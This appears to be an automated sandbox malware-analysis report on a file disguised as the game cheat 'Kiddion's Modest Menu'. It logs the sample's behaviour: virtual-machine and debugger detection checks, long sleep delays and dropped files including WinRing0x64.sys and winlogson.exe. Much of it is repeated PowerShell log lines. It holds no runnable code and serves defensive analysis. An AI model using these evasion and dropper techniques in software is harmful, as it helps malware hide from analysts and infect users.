                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeMemory allocated: 49D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeWindow / User API: threadDelayed 6016Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeWindow / User API: threadDelayed 675Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeWindow / User API: threadDelayed 1915Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7661Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1958Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe TID: 7748Thread sleep time: -150000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe TID: 7772Thread sleep count: 6016 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 7228Thread sleep count: 675 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 7228Thread sleep count: 1915 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 7776Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -598796s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe TID: 2688Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep count: 7661 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 1958 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A3FCDE FindFirstFileExW,0_2_00A3FCDE
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A3FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00A3FD8F
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A3FCDE FindFirstFileExW,2_2_00A3FCDE
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A3FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00A3FD8F
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drBinary or memory string: Vmwaretrat
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drBinary or memory string: vboxservice
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018457291.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017332107.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1310526188.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017742790.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394069293.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2393484087.000000000158C000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018457291.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017332107.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1310526188.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017742790.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394069293.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drBinary or memory string: Vmwareuser
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1486956523.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.0000000001657000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017416574.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000000.1416561359.0000000000662000.00000002.00000001.01000000.00000008.sdmp, 1C2NX3IUVJPXMLDGP.exe.2.drBinary or memory string: vboxtray
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drBinary or memory string: Vmtoolsd
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,0_2_009C553B
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A2DC9E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A561B4 mov edi, dword ptr fs:[00000030h]0_2_00A561B4
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A3B71C GetProcessHeap,0_2_00A3B71C
